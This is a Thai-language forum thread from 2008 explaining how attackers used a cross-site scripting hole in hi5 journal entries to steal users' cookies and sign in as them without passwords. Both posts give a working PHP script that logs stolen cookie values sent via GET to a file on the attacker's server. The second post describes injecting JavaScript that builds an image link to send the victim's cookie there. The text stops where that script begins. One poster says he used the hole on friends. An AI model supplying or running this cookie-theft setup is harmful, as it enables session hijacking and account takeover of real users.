วิธีที่ hacker ใช้ช่องโหว่ของ hi5 จาก journal entry

[tonhor]

ูวิธีที่ hacker ใช้ช่องโหว่ของ hi5 จาก journal entry

ซึ่งตรงนี้หลายๆคนที่ใช้ javascript ในการตกแต่ง hi5 ก็รู้อยู่แล้ว

วิธีใส่ javascript ก็ดูจากเวปนี้ http://www.zone-it.com/31603 (ทั้ง IE&firefox)

แต่เมื่อวันที่ 18 เมษ 2551 ช่วงเย็นๆ hi5 ได้ทำการบล็อคช่องโหว่นี้ (เพราะตอนเช้าผมยังลองใช้แกล้งเพื่อนอยู่เลย)

เนื่องจากมีผู้ที่ใช้ ในทางที่ไม่ดี สามารถหาข้อมูลส่วนตัวของผู้ใช้(หรือ cookie)

และยังสามารถ Sign In เป็นชื่อผู้ใช้คนอื่นโดยไม่ต้องรู้รหัสผ่านด้วย sid


มาดูวิธีของ เขากัน...

[hide=30]1.เขียน php script เพื่อเอาไว้รันและเก็บ ข้อมูล cookie ของ user
[code]<?php

$fp = fopen(&#39;./cookie.txt&#39;, &#39;a&#39;
fwrite ($fp, print_r($_GET, 1) . "\n");
fclose ($fp);

echo "<H2>HTTP 404 Page Not Found.<H2>"

[hansa]

ไม่รู้เป็นอันเดียวกันเปล่า เพราะ เปิดดูไม่ได้ครับ ก็เลยข้อใส่ไว้กระทู้เดียวกันละกันครับ
ก็เป็นหนึ่งในวิธีที่ใช่ xss กับ hi5 ครับ

[hide=30]
Security Hole Discovered in hi5!

สร้าง code php ไว้ที่ server ตามข้างล่างนี้ครับ เพื่อคอยเก็บข้อมูลที่เราขโมยคุกกี้มาได้

Code:

<?php

$fp = fopen(&#39;./data&#39;, &#39;a&#39;);
fwrite ($fp, print_r($_GET, 1) . "\n");
fclose ($fp);

?>

เอา javascript ด้านล่าง ไปใส่ผ่านช่องโหว่ของ journal entry เราก็จะสามารถ ขโมย คุกกี้มาได้ ครับ
ซึ่งหลักการ ของ javascript คือการสร้าง link ของ รูป ซึ่ง urlของรูป จะแอบส่ง ค่าคุกกี้ไป
[code]
<script>